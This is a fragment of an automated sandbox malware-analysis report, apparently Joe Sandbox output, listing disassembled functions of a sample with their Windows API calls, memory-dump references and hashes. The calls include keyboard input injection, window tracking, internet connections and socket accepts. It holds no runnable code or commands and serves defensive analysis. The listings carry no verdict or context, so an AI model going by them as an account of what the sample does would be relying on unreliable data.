                                    • Instruction Fuzzy Hash: E941C278A01299DFCB12DF9AC884B69BBF9FF85310F1981A9E414CB251D331ED42CB41
                                    Function 009C3A61 Relevance: 6.1, APIs: 4, Instructions: 104keyboardwindowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetKeyboardState.USER32(?,75A8C0D0,?,00008000), ref: 009C3AB8
                                    • SetKeyboardState.USER32(00000080,?,00008000), ref: 009C3AD4
                                    • PostMessageW.USER32(00000000,00000101,00000000,?), ref: 009C3B34
                                    • SendInput.USER32(00000001,?,0000001C,75A8C0D0,?,00008000), ref: 009C3B92
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: KeyboardState$InputMessagePostSend
                                    • String ID:
                                    • API String ID: 432972143-0
                                    • Opcode ID: 387c9f612bf0bcf245ea912ef994a790dc6e597cd2b81d2c396bbb52ce196f85
                                    • Instruction ID: 483bea4e439c41a9839b1455b5b3ae5cdb5cd2e4aecd67e9d602a0fa22632e57
                                    • Opcode Fuzzy Hash: 387c9f612bf0bcf245ea912ef994a790dc6e597cd2b81d2c396bbb52ce196f85
                                    • Instruction Fuzzy Hash: 0A312471E00258AEEF209BA48819FFE7BB99B55310F04C15EE481A32D1C7759F46D763
                                    Function 009B4004 Relevance: 6.1, APIs: 4, Instructions: 96COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 009B4038
                                    • __isleadbyte_l.LIBCMT ref: 009B4066
                                    • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,?,00000000,?,00000000,?,?,?), ref: 009B4094
                                    • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,?,00000000,?,00000000,?,?,?), ref: 009B40CA
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                    • String ID:
                                    • API String ID: 3058430110-0
                                    • Opcode ID: 988095d25b6a25d52c50adb387920ebe899b5b3e83b1e1394ae2d6f6de9b502d
                                    • Instruction ID: 8b4c0a4d6227ca08d354224eaad4e938d974d34d6bacbdb365c3c3a36273ff79
                                    • Opcode Fuzzy Hash: 988095d25b6a25d52c50adb387920ebe899b5b3e83b1e1394ae2d6f6de9b502d
                                    • Instruction Fuzzy Hash: E031B23160021AAFDB21EF74C945BFA7BB9FF41320F154528EA65871A2E731D891EB90
                                    Function 009E7CA5 Relevance: 6.1, APIs: 4, Instructions: 93COMMON
                                    Download Yara Rule
                                    APIs
                                    • GetForegroundWindow.USER32 ref: 009E7CB9
                                      • Part of subcall function 009C5F55: GetWindowThreadProcessId.USER32(?,00000000), ref: 009C5F6F
                                      • Part of subcall function 009C5F55: GetCurrentThreadId.KERNEL32 ref: 009C5F76
                                      • Part of subcall function 009C5F55: AttachThreadInput.USER32(00000000,?,009C781F), ref: 009C5F7D
                                    • GetCaretPos.USER32(?), ref: 009E7CCA
                                    • ClientToScreen.USER32(00000000,?), ref: 009E7D03
                                    • GetForegroundWindow.USER32 ref: 009E7D09
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                    • String ID:
                                    • API String ID: 2759813231-0
                                    • Opcode ID: cf9c610f83d658d38e762982619fa4085d746d0fcf1fbefb59cb56d7181796ba
                                    • Instruction ID: 7cbec740e6a5c9adb0da6a1b4f28c0b060de5650aa1fdfc92cef2c9d66c033c2
                                    • Opcode Fuzzy Hash: cf9c610f83d658d38e762982619fa4085d746d0fcf1fbefb59cb56d7181796ba
                                    • Instruction Fuzzy Hash: 6A310F72D00108AFDB01EFA9D845AEFBBF9EF94310B10846AE815E3211D6319E45CBA1
                                    Function 009D431C Relevance: 6.1, APIs: 4, Instructions: 78networkCOMMON
                                    Download Yara Rule
                                    APIs
                                    • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 009D4358
                                      • Part of subcall function 009D43E2: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 009D4401
                                      • Part of subcall function 009D43E2: InternetCloseHandle.WININET(00000000), ref: 009D449E
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: Internet$CloseConnectHandleOpen
                                    • String ID:
                                    • API String ID: 1463438336-0
                                    • Opcode ID: 8124469b37c2f026f11c5844ce73a11ebc6a8e6c2aeb553fa9417ee614a066b8
                                    • Instruction ID: 19d6a78dab12995e3cb8875631ba4a52004fe1d1e70dce81a4073e9eec273f9c
                                    • Opcode Fuzzy Hash: 8124469b37c2f026f11c5844ce73a11ebc6a8e6c2aeb553fa9417ee614a066b8
                                    • Instruction Fuzzy Hash: 7B21CF32280605BBEB119FA4DD00FBBF7ADFF84710F04801BBA1596750DB7198229BA0
                                    Function 009E8A37 Relevance: 6.1, APIs: 4, Instructions: 69COMMON
                                    Download Yara Rule
                                    APIs
                                    • GetWindowLongW.USER32(?,000000EC), ref: 009E8AA6
                                    • SetWindowLongW.USER32(?,000000EC,00000000), ref: 009E8AC0
                                    • SetWindowLongW.USER32(?,000000EC,00000000), ref: 009E8ACE
                                    • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 009E8ADC
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: Window$Long$AttributesLayered
                                    • String ID:
                                    • API String ID: 2169480361-0
                                    • Opcode ID: 6937b39569b7429d4e7463a71d1115a1a8e0bfa78c0c01e2f9c251cb38c02a8a
                                    • Instruction ID: 98d12a3ac35bb865cc9133470e25ed8e8731bd74b80c6c6c94ac531ca68355ef
                                    • Opcode Fuzzy Hash: 6937b39569b7429d4e7463a71d1115a1a8e0bfa78c0c01e2f9c251cb38c02a8a
                                    • Instruction Fuzzy Hash: E911D032205115AFDB05AB99CC05FBB779DBF85320F144129F82AC72E2CB74AD028B90
                                    Function 009D8A7F Relevance: 6.1, APIs: 4, Instructions: 69networkCOMMON
                                    Download Yara Rule
                                    APIs
                                    • select.WSOCK32(00000000,00000001,00000000,00000000,?), ref: 009D8AE0
                                    • __WSAFDIsSet.WSOCK32(00000000,00000001), ref: 009D8AF2
                                    • accept.WSOCK32(00000000,00000000,00000000), ref: 009D8AFF
                                    • WSAGetLastError.WSOCK32(00000000), ref: 009D8B16
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: ErrorLastacceptselect
                                    • String ID:
                                    • API String ID: 385091864-0
                                    • Opcode ID: 964026f4249e81cfb36591394a7706b1a5d8b817d6615f0cce9f2f5e89405363
                                    • Instruction ID: 9c3ad14196768b47c7df62150934a5bbf2594bfd67fcf21b8aea7e47ad078254
                                    • Opcode Fuzzy Hash: 964026f4249e81cfb36591394a7706b1a5d8b817d6615f0cce9f2f5e89405363
                                    • Instruction Fuzzy Hash: B8216672A00124AFC711DFA9C885A9E7BFCEF49350F00816AF849D7291DB74DA418F90
                                    Function 009C0AA6 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 68stringCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 009C1E68: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,009C0ABB,?,?,?,009C187A,00000000,000000EF,00000119,?,?), ref: 009C1E77
                                      • Part of subcall function 009C1E68: lstrcpyW.KERNEL32(00000000,?,?,009C0ABB,?,?,?,009C187A,00000000,000000EF,00000119,?,?,00000000), ref: 009C1E9D
                                      • Part of subcall function 009C1E68: lstrcmpiW.KERNEL32(00000000,?,009C0ABB,?,?,?,009C187A,00000000,000000EF,00000119,?,?), ref: 009C1ECE
                                    • lstrlenW.KERNEL32(?,00000002,?,?,?,?,009C187A,00000000,000000EF,00000119,?,?,00000000), ref: 009C0AD4
                                    • lstrcpyW.KERNEL32(00000000,?,?,009C187A,00000000,000000EF,00000119,?,?,00000000), ref: 009C0AFA
                                    • lstrcmpiW.KERNEL32(00000002,cdecl,?,009C187A,00000000,000000EF,00000119,?,?,00000000), ref: 009C0B2E
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: lstrcmpilstrcpylstrlen
                                    • String ID: cdecl
                                    • API String ID: 4031866154-3896280584
                                    • Opcode ID: 84ddc52080e5e4f99cf10372c47fd5ef3284da57bdc0c170a101a5d57bf7b557
                                    • Instruction ID: e448c183f30af666d9468729e87302250749f4303711315c34d130f55fb7268e
                                    • Opcode Fuzzy Hash: 84ddc52080e5e4f99cf10372c47fd5ef3284da57bdc0c170a101a5d57bf7b557
                                    • Instruction Fuzzy Hash: AE117F36600305EFDB25AF64D845E7A77A8FF89354F80416AF906CB250EB719851C7A2
                                    Function 009B2F96 Relevance: 6.1, APIs: 4, Instructions: 67COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    • _free.LIBCMT ref: 009B2FB5
                                      • Part of subcall function 009A395C: __FF_MSGBANNER.LIBCMT ref: 009A3973
                                      • Part of subcall function 009A395C: __NMSG_WRITE.LIBCMT ref: 009A397A
                                      • Part of subcall function 009A395C: RtlAllocateHeap.NTDLL(00C70000,00000000,00000001,00000001,00000000,?,?,0099F507,?,0000000E), ref: 009A399F
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: AllocateHeap_free
                                    • String ID:
                                    • API String ID: 614378929-0
                                    • Opcode ID: a8826503f141c51e3cf3b16b672d2b93e4bc3fe2ec83af8fe9231c5bb82b7907
                                    • Instruction ID: 875e41c5aa1513d468b45f44d1ea62f73f96e3eea17f2a2dda4e56d2f4060594
                                    • Opcode Fuzzy Hash: a8826503f141c51e3cf3b16b672d2b93e4bc3fe2ec83af8fe9231c5bb82b7907
                                    • Instruction Fuzzy Hash: 0A112C32409215ABCB317FF4AD057AA7BA8EF85370F208825F8499A251DB34CD4196D0
                                    Function 0099EB83 Relevance: 6.1, APIs: 4, Instructions: 65timewindowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • _memset.LIBCMT ref: 0099EBB2
                                      • Part of subcall function 009851AF: _memset.LIBCMT ref: 0098522F
                                      • Part of subcall function 009851AF: _wcscpy.LIBCMT ref: 00985283
                                      • Part of subcall function 009851AF: Shell_NotifyIconW.SHELL32(00000001,?), ref: 00985293
                                    • KillTimer.USER32(?,00000001,?,?), ref: 0099EC07
                                    • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 0099EC16
                                    • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 009F3C88
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
                                    • String ID:
                                    • API String ID: 1378193009-0
                                    • Opcode ID: 211f93f6eb73993e9ce32dab5cf50185aa7187615ced1cdb207bd282a7e3fd47
                                    • Instruction ID: 7f5c63486e760215467db79599eeb38bbb3ec6f9f0477dad00ce846e71f802d7
                                    • Opcode Fuzzy Hash: 211f93f6eb73993e9ce32dab5cf50185aa7187615ced1cdb207bd282a7e3fd47
                                    • Instruction Fuzzy Hash: AD21D7759047889FEB32DB68C859BF7BFEC9B41308F04048DE6DE56282D3786A858B51
                                    Function 009C058F Relevance: 6.1, APIs: 4, Instructions: 64registryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 009C05AC
                                    • LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 009C05C7
                                    • RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 009C05DD
                                    • FreeLibrary.KERNEL32(?), ref: 009C0632
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: Type$FileFreeLibraryLoadModuleNameRegister
                                    • String ID:
                                    • API String ID: 3137044355-0
                                    • Opcode ID: 4730f14a5fd3060e064bdd984e5753f11de1f2a8e87fa10d7d4c364ffff39864
                                    • Instruction ID: ba932f8cc20bdafa941f3ef42bc826610440d553843c69902535de92f71a3bb8
                                    • Opcode Fuzzy Hash: 4730f14a5fd3060e064bdd984e5753f11de1f2a8e87fa10d7d4c364ffff39864
                                    • Instruction Fuzzy Hash: A8215E71D00209EBDB20CFD1DD88FDABBB8EB80700F008A6DA516A6050D774EA559B62
                                    Function 009C6713 Relevance: 6.1, APIs: 4, Instructions: 64fileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 009C6733
                                    • _memset.LIBCMT ref: 009C6754
                                    • DeviceIoControl.KERNEL32(00000000,0004D02C,?,00000200,?,00000200,?,00000000), ref: 009C67A6
                                    • CloseHandle.KERNEL32(00000000), ref: 009C67AF
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: CloseControlCreateDeviceFileHandle_memset
                                    • String ID:
                                    • API String ID: 1157408455-0
                                    • Opcode ID: d43cfc31e056aa7a19e4a7723dcaf9ff6bf107cc5c6e441e2ea6cc89b05381e1
                                    • Instruction ID: 4013db09a9df87430387817978941da04c46117edbb79506772bf77248095547
                                    • Opcode Fuzzy Hash: d43cfc31e056aa7a19e4a7723dcaf9ff6bf107cc5c6e441e2ea6cc89b05381e1
                                    • Instruction Fuzzy Hash: 7A11E372D012287AE7209BA5AC4DFABBABCEF44724F10469AF504E71C0D2744E818BB5
                                    Function 009BB1CC Relevance: 6.1, APIs: 4, Instructions: 63memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 009BAA62: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 009BAA79
                                      • Part of subcall function 009BAA62: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 009BAA83
                                      • Part of subcall function 009BAA62: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 009BAA92
                                      • Part of subcall function 009BAA62: RtlAllocateHeap.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 009BAA99
                                      • Part of subcall function 009BAA62: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 009BAAAF
                                    • GetLengthSid.ADVAPI32(?,00000000,009BADE4,?,?), ref: 009BB21B
                                    • GetProcessHeap.KERNEL32(00000008,00000000), ref: 009BB227
                                    • RtlAllocateHeap.KERNEL32(00000000), ref: 009BB22E
                                    • CopySid.ADVAPI32(?,00000000,?), ref: 009BB247
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: Heap$AllocateInformationProcessToken$CopyErrorLastLength
                                    • String ID:
                                    • API String ID: 259861997-0
                                    • Opcode ID: 6374a884fdc71918e64fd053d0649d765ca5fb05efa1d82785386914f7606997
                                    • Instruction ID: 8cdd09c6e6e012db11b183c998d656e87e3717b79f065d400ba41f2995106d39
                                    • Opcode Fuzzy Hash: 6374a884fdc71918e64fd053d0649d765ca5fb05efa1d82785386914f7606997
                                    • Instruction Fuzzy Hash: 9611C172A00209EFCB04DF98DE85AEEB7BDEF94324F14842DE95297250D771AE45CB10
                                    Function 009BB478 Relevance: 6.1, APIs: 4, Instructions: 58windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • SendMessageW.USER32(?,000000B0,?,?), ref: 009BB498
                                    • SendMessageW.USER32(?,000000C9,?,00000000), ref: 009BB4AA
                                    • SendMessageW.USER32(?,000000C9,?,00000000), ref: 009BB4C0
                                    • SendMessageW.USER32(?,000000C9,?,00000000), ref: 009BB4DB
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: MessageSend
                                    • String ID:
                                    • API String ID: 3850602802-0
                                    • Opcode ID: 0473f0c73cd4896781e71c87c2e196984c977551506435d3d63b7015a06ee839
                                    • Instruction ID: 394e054c74d0dcd5cc4b2817aad2b0ac95cf61a3d9bb344deb98a1337eaf2cd0
                                    • Opcode Fuzzy Hash: 0473f0c73cd4896781e71c87c2e196984c977551506435d3d63b7015a06ee839
                                    • Instruction Fuzzy Hash: BA11487A900218FFDB11DFA8C981EDDBBB9FB08710F204091E604B7290D771AE11DB94
                                    Function 009C732B Relevance: 6.1, APIs: 4, Instructions: 55synchronizationthreadwindowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetCurrentThreadId.KERNEL32 ref: 009C7352
                                    • MessageBoxW.USER32(?,?,?,?), ref: 009C7385
                                    • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 009C739B
                                    • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 009C73A2
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                                    • String ID:
                                    • API String ID: 2880819207-0
                                    • Opcode ID: bd503fd56cd125ad19e2fcafe0617a30a655cea55b15f523d3d2fec158f407ce
                                    • Instruction ID: b8889ea6bad486451a87a50d5b30f80cb7f738273f1ec77adf355ee69ba3ddd0
                                    • Opcode Fuzzy Hash: bd503fd56cd125ad19e2fcafe0617a30a655cea55b15f523d3d2fec158f407ce
                                    • Instruction Fuzzy Hash: 2511E577A04258BBCB01DBE89C05FDEBBAD9B85324F044319F821D3291D6B189029FA1
                                    Function 0099D17C Relevance: 6.1, APIs: 4, Instructions: 53windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0099D1BA
                                    • GetStockObject.GDI32(00000011), ref: 0099D1CE
                                    • SendMessageW.USER32(00000000,00000030,00000000), ref: 0099D1D8
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: CreateMessageObjectSendStockWindow
                                    • String ID:
                                    • API String ID: 3970641297-0
                                    • Opcode ID: 92b65e2f37ce341083806b006b958a6d928dab28b29f53462f4b4fd38a07e733
                                    • Instruction ID: f2a2682d316aacb568e5340bac4da6a9c1d8c107f10af0a273b79beb82ab45f2
                                    • Opcode Fuzzy Hash: 92b65e2f37ce341083806b006b958a6d928dab28b29f53462f4b4fd38a07e733
                                    • Instruction Fuzzy Hash: 0B118B7310650DBFEF268FD89C90EEABB6EFF19364F040105FA1552060C7329C629BA0
